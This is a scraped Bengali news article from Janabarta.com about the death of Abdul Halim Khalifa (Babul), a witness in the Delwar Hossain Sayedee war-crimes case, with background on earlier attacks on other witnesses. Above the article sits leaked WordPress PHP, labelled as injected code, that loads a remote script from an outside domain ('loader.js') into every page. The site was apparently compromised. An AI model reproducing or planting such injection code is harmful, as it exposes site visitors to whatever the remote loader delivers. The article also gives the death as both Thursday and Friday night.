// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site মারা গেলেন সাঈদীর মামলার অন্যতম সাক্ষী বাবুল - Janabarta.com

মারা গেলেন সাঈদীর মামলার অন্যতম সাক্ষী বাবুল

আব্দুল হালিম খলিফা ওরফে বাবুল। ছবি- সংগৃহীত

নিজস্ব প্রতিবেদক: চলে গেলেন আব্দুল হালিম খলিফা ওরফে বাবুল। তিনি একাত্তরের মানবতাবিরোধী অপরাধের দায়ে আমৃত্যু কারাদণ্ডপ্রাপ্ত দেলোয়ার হোসেন সাঈদীর বিরুদ্ধে দায়ের হওয়া মামলার অন্যতম সাক্ষী।

বৃহস্পতিবার দিবাগত রাত সাড়ে ১২টার দিকে পিরোজপুর জেলার ইন্দুরকানি উপজেলার বৌডুবি গ্রামে নিজ বাড়িতে শেষ নিঃশ্বাস ত্যাগ করেন তিনি। মৃত্যুকালে তার বয়স হয়েছিল ৫৫ বছর। বাবুল মৃত্যুকালে স্ত্রী, এক ছেলে ও দুই মেয়ে রেখে গেছেন।

বিষয়টি নিশ্চিত করে ইন্দুরকানি থানার ভারপ্রাপ্ত কর্মকর্তা (ওসি) মো. হাবিবুর রহমান জানান, গত মঙ্গলবার হৃদরোগে আক্রান্ত হন বাবুল। ওইদিন তাকে চিকিৎসার জন্য খুলনা মেডিকেল কলেজ (খুমেক) হাসপাতালে নেওয়া হয়। পরে বুধবার শারীরিক অবস্থার উন্নতি হলে তাকে ইন্দুরকানি নিজ বাড়িতে নিয়ে আসা হয়। সেখানেই শুক্রবার দিবাগত রাত সাড়ে ১২টার দিকে মারা যান তিনি।

ওসি আরো জানান, শুক্রবার সকালে জানাজা শেষে বাবুলকে পারিবারিক কবরস্থানে দাফন করা হয়।

প্রসঙ্গত, ২০১৩ সালে রাতের আঁধারে সাঈদীর বিরুদ্ধে দায়ের হওয়া মামলার অন্যতম সাক্ষী মোস্তফা হাওলাদারকে ঘরে ঢুকে কুপিয়ে জখম করে দুর্বৃত্তরা। পরে ঢাকা চিকিৎসাধীন অবস্থায় মারা যান তিনি। ওই বছরই আরেক সাক্ষী মাহবুবুল আলম হাওলাদারে বাড়িতে হামলা চালায় দুবৃত্তরা। তখন থেকেই ওই মামলার সকল সাক্ষীদের বাড়িতে পুলিশ মোতায়েনের মাধ্যমে নিরাপত্তার ব্যবস্থা করে সরকার।